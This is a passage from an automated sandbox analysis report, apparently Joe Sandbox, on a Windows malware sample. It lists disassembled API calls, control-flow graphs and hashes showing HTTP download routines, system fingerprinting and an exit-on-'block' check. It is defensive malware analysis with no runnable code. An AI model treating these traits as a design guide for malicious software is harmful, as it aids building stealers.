                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: e2408d6c85ea102479abc7caba2cabf46d48e1b79d44578d10f071493ed6320d
                          • Instruction ID: 7dd571912541d157e548ebee82a0cddb543bd145b5e4eb337341c96a9a489d85
                          • Opcode Fuzzy Hash: e2408d6c85ea102479abc7caba2cabf46d48e1b79d44578d10f071493ed6320d
                          • Instruction Fuzzy Hash: 006271B56112099FD754DFE4EC98A2737BAF7883413008919E996C3376DB78A843DF28
                          APIs
                          • lstrlen.KERNEL32(007FCFEC), ref: 007EF1D5
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF1F1
                          • lstrlen.KERNEL32(007FCFEC), ref: 007EF1FC
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF215
                          • lstrlen.KERNEL32(007FCFEC), ref: 007EF220
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF239
                          • lstrcpy.KERNEL32(00000000,00804FA0), ref: 007EF25E
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF28C
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF2C0
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EF2F0
                          • lstrlen.KERNEL32(01245910), ref: 007EF315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 444a874783de82e8ff214757f998f93cd5d6d816275b3d6b75e96bbd73b2c873
                          • Instruction ID: bc3328d9fd4823341d17d41ad340a1f4fa8069dce9cd627e0419d8480011150a
                          • Opcode Fuzzy Hash: 444a874783de82e8ff214757f998f93cd5d6d816275b3d6b75e96bbd73b2c873
                          • Instruction Fuzzy Hash: 43A26370A02246CFDB20DF66D948A5AB7F4AF48314F18857AE849DB762DB39DC43CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0013
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F00BD
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F00E1
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F00EC
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0110
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F011B
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F013F
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F015A
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0189
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F0194
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F01C3
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F01CE
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0206
                          • lstrlen.KERNEL32(007FCFEC), ref: 007F0250
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F0288
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F059B
                          • lstrlen.KERNEL32(01245A10), ref: 007F05AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F05D7
                          • lstrcat.KERNEL32(00000000,?), ref: 007F05E3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F060E
                          • lstrlen.KERNEL32(0125E550), ref: 007F0625
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F064C
                          • lstrcat.KERNEL32(00000000,?), ref: 007F0658
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F0681
                          • lstrlen.KERNEL32(012459B0), ref: 007F0698
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F06C9
                          • lstrcat.KERNEL32(00000000,?), ref: 007F06D5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F0706
                          • lstrcpy.KERNEL32(00000000,01258F68), ref: 007F074B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F077F
                          • lstrcpy.KERNEL32(00000000,0125E3B8), ref: 007F07E7
                          • lstrcpy.KERNEL32(00000000,01259148), ref: 007F0858
                          • lstrcpy.KERNEL32(00000000,fplugins), ref: 007F08CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F0928
                          • lstrcpy.KERNEL32(00000000,01259298), ref: 007F09F8
                            • Part of subcall function 007D24E0: lstrcpy.KERNEL32(00000000,?), ref: 007D2528
                            • Part of subcall function 007D24E0: lstrcpy.KERNEL32(00000000,?), ref: 007D254E
                            • Part of subcall function 007D24E0: lstrcpy.KERNEL32(00000000,?), ref: 007D2577
                          • lstrcpy.KERNEL32(00000000,012591C8), ref: 007F0ACE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F0B81
                          • lstrcpy.KERNEL32(00000000,012591C8), ref: 007F0D58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID: fplugins
                          • API String ID: 2500673778-38756186
                          • Opcode ID: 9685b3ad9971a85f39c682d510a9f23497f1ff8e5e31d7078d59728b48f31cb7
                          • Instruction ID: ae12c909e126d27c89d79c84f49774c832c6134e0e423eb30a21c2ebab57e07c
                          • Opcode Fuzzy Hash: 9685b3ad9971a85f39c682d510a9f23497f1ff8e5e31d7078d59728b48f31cb7
                          • Instruction Fuzzy Hash: 70E24A70A05345CFD724DF69C488B6AB7F0BF88314F58856ED58D8B362DB399842CB92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 7d6c40-7d6c64 call 7d2930 2237 7d6c75-7d6c97 call 7d4bc0 2234->2237 2238 7d6c66-7d6c6b 2234->2238 2242 7d6c99 2237->2242 2243 7d6caa-7d6cba call 7d2930 2237->2243 2238->2237 2239 7d6c6d-7d6c6f lstrcpy 2238->2239 2239->2237 2244 7d6ca0-7d6ca8 2242->2244 2247 7d6cbc-7d6cc2 lstrcpy 2243->2247 2248 7d6cc8-7d6cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 7d6cfa-7d6cfc 2248->2249 2250 7d6cf7 2248->2250 2251 7d6ea8-7d6ebb call 7d2930 2249->2251 2252 7d6d02-7d6d22 InternetConnectA 2249->2252 2250->2249 2261 7d6ebd-7d6ebf 2251->2261 2262 7d6ec9-7d6ee0 call 7d2a20 * 2 2251->2262 2253 7d6d28-7d6d5d HttpOpenRequestA 2252->2253 2254 7d6ea1-7d6ea2 InternetCloseHandle 2252->2254 2256 7d6e94-7d6e9e InternetCloseHandle 2253->2256 2257 7d6d63-7d6d65 2253->2257 2254->2251 2256->2254 2259 7d6d7d-7d6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 7d6d67-7d6d77 InternetSetOptionA 2257->2260 2263 7d6daf-7d6dd3 call 7f71e0 call 7d2a20 * 2 2259->2263 2264 7d6dd4-7d6de4 call 7f3d90 2259->2264 2260->2259 2261->2262 2265 7d6ec1-7d6ec3 lstrcpy 2261->2265 2264->2263 2274 7d6de6-7d6de8 2264->2274 2265->2262 2276 7d6e8d-7d6e8e InternetCloseHandle 2274->2276 2277 7d6dee-7d6e07 InternetReadFile 2274->2277 2276->2256 2277->2276 2279 7d6e0d 2277->2279 2281 7d6e10-7d6e15 2279->2281 2281->2276 2283 7d6e17-7d6e3d call 7f7310 2281->2283 2286 7d6e3f call 7d2a20 2283->2286 2287 7d6e44-7d6e51 call 7d2930 2283->2287 2286->2287 2291 7d6e61-7d6e8b call 7d2a20 InternetReadFile 2287->2291 2292 7d6e53-7d6e57 2287->2292 2291->2276 2291->2281 2292->2291 2293 7d6e59-7d6e5b lstrcpy 2292->2293 2293->2291
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D6C6F
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007D6CC2
                          • InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D6CD5
                          • StrCmpCA.SHLWAPI(?,0125EB38), ref: 007D6CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007D6D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,0125E328,00000000,00000000,-00400100,00000000), ref: 007D6D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 007D6D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007D6D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 007D6DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007D6DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D6E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 007D6E7D
                          • InternetCloseHandle.WININET(00000000), ref: 007D6E8E
                          • InternetCloseHandle.WININET(?), ref: 007D6E98
                          • InternetCloseHandle.WININET(00000000), ref: 007D6EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007D6EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: a5a36e6262c9a8d1bedcf397706fd8b645d648b011038c9ece0ca8c4ed7170f7
                          • Instruction ID: 6542a6e26056e8faa3e40dff90a348897c662c5b654c0e3f0fb7a628e438b00b
                          • Opcode Fuzzy Hash: a5a36e6262c9a8d1bedcf397706fd8b645d648b011038c9ece0ca8c4ed7170f7
                          • Instruction Fuzzy Hash: 3781A171A51219ABEB20DFA4DC49FAF77B8EF44700F044169F945E7381DB78AD068BA0
                          APIs
                          • lstrlen.KERNEL32(01245910), ref: 007EF315
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF3A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF3C7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF47B
                          • lstrcpy.KERNEL32(00000000,01245910), ref: 007EF4BB
                          • lstrcpy.KERNEL32(00000000,01259058), ref: 007EF4EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF59E
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007EF61C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF64C
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF69A
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 007EF718
                          • lstrlen.KERNEL32(01258F38), ref: 007EF746
                          • lstrcpy.KERNEL32(00000000,01258F38), ref: 007EF771
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EF793
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF7E4
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 007EFA32
                          • lstrlen.KERNEL32(01258F48), ref: 007EFA60
                          • lstrcpy.KERNEL32(00000000,01258F48), ref: 007EFA8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EFAAD
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EFAFE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 5cdecfdcb27484cc4e45a17b55e1fc612578afe9bb0c4c0200efa314510467f2
                          • Instruction ID: d0fb602d524bea1ab58397e8a0c6ca408d28308056d050c9d6a753e141c7e0ec
                          • Opcode Fuzzy Hash: 5cdecfdcb27484cc4e45a17b55e1fc612578afe9bb0c4c0200efa314510467f2
                          • Instruction Fuzzy Hash: 32F12C70A02246CFDB64DF6AC858A16B7F5BF48314B19C1BAD4099B7A2E739DC43CB50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2721 7e8ca0-7e8cc4 StrCmpCA 2722 7e8ccd-7e8ce6 2721->2722 2723 7e8cc6-7e8cc7 ExitProcess 2721->2723 2725 7e8cec-7e8cf1 2722->2725 2726 7e8ee2-7e8eef call 7d2a20 2722->2726 2728 7e8cf6-7e8cf9 2725->2728 2730 7e8cff 2728->2730 2731 7e8ec3-7e8edc 2728->2731 2732 7e8dbd-7e8dcb StrCmpCA 2730->2732 2733 7e8ddd-7e8deb StrCmpCA 2730->2733 2734 7e8dfd-7e8e0b StrCmpCA 2730->2734 2735 7e8e1d-7e8e2b StrCmpCA 2730->2735 2736 7e8e3d-7e8e4b StrCmpCA 2730->2736 2737 7e8d5a-7e8d69 lstrlen 2730->2737 2738 7e8e56-7e8e64 StrCmpCA 2730->2738 2739 7e8d30-7e8d3f lstrlen 2730->2739 2740 7e8e6f-7e8e7d StrCmpCA 2730->2740 2741 7e8e88-7e8e9a lstrlen 2730->2741 2742 7e8d06-7e8d15 lstrlen 2730->2742 2743 7e8d84-7e8d92 StrCmpCA 2730->2743 2744 7e8da4-7e8db8 StrCmpCA 2730->2744 2731->2726 2763 7e8cf3 2731->2763 2732->2731 2746 7e8dd1-7e8dd8 2732->2746 2733->2731 2747 7e8df1-7e8df8 2733->2747 2734->2731 2748 7e8e11-7e8e18 2734->2748 2735->2731 2749 7e8e31-7e8e38 2735->2749 2736->2731 2750 7e8e4d-7e8e54 2736->2750 2759 7e8d6b-7e8d70 call 7d2a20 2737->2759 2760 7e8d73-7e8d7f call 7d2930 2737->2760 2738->2731 2753 7e8e66-7e8e6d 2738->2753 2757 7e8d49-7e8d55 call 7d2930 2739->2757 2758 7e8d41-7e8d46 call 7d2a20 2739->2758 2740->2731 2754 7e8e7f-7e8e86 2740->2754 2755 7e8e9c-7e8ea1 call 7d2a20 2741->2755 2756 7e8ea4-7e8eb0 call 7d2930 2741->2756 2751 7e8d1f-7e8d2b call 7d2930 2742->2751 2752 7e8d17-7e8d1c call 7d2a20 2742->2752 2743->2731 2745 7e8d98-7e8d9f 2743->2745 2744->2731 2745->2731 2746->2731 2747->2731 2748->2731 2749->2731 2750->2731 2779 7e8eb3-7e8eb5 2751->2779 2752->2751 2753->2731 2754->2731 2755->2756 2756->2779 2757->2779 2758->2757 2759->2760 2760->2779 2763->2728 2779->2731 2780 7e8eb7-7e8eb9 2779->2780 2780->2731 2781 7e8ebb-7e8ebd lstrcpy 2780->2781 2781->2731
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 42cd323f72d36f2163e7481a5c8198d89d2dd35b1fe88f30324908b6fe383007
                          • Instruction ID: 98311c023b46f69e6717b1dca8aec10161c08d01d1841d7625614b7c7ab53468
                          • Opcode Fuzzy Hash: 42cd323f72d36f2163e7481a5c8198d89d2dd35b1fe88f30324908b6fe383007
                          • Instruction Fuzzy Hash: D8519FB0A05785DBD7A0DFB6DC88A2B77F4FB58700B10481DE58AD2661DB7CE4439B22

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2782 7f2740-7f2783 GetWindowsDirectoryA 2783 7f278c-7f27ea GetVolumeInformationA 2782->2783 2784 7f2785 2782->2784 2785 7f27ec-7f27f2 2783->2785 2784->2783 2786 7f2809-7f2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 7f27f4-7f2807 2785->2787 2788 7f2826-7f2844 wsprintfA 2786->2788 2789 7f2822-7f2824 2786->2789 2787->2785 2790 7f285b-7f2872 call 7f71e0 2788->2790 2789->2790
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 007F277B
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,007E93B6,00000000,00000000,00000000,00000000), ref: 007F27AC
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F280F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007F2816
                          • wsprintfA.USER32 ref: 007F283B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                          • String ID: :\$C
                          • API String ID: 2572753744-3309953409
                          • Opcode ID: ce1ba069c881c7d6e3d1d1b041ed7efac219923de9526c166cd966f6ff3029c5
                          • Instruction ID: 061a1deb564efdf6058c249832bf3d9afa1f27fc5a0f72abba38ef99c6ef1fd8
                          • Opcode Fuzzy Hash: ce1ba069c881c7d6e3d1d1b041ed7efac219923de9526c166cd966f6ff3029c5
                          • Instruction Fuzzy Hash: F33192B1D0820D9BCB04CFF889859EFBFBCEF58750F104169E605F7651E2348A418BA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2793 7d4bc0-7d4bce 2794 7d4bd0-7d4bd5 2793->2794 2794->2794 2795 7d4bd7-7d4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 7d2a20 2794->2795
                          APIs
                          • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 007D4BF7
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007D4C01
                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007D4C0B
                          • lstrlen.KERNEL32(?,00000000,?), ref: 007D4C1F
                          • InternetCrackUrlA.WININET(?,00000000), ref: 007D4C27
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
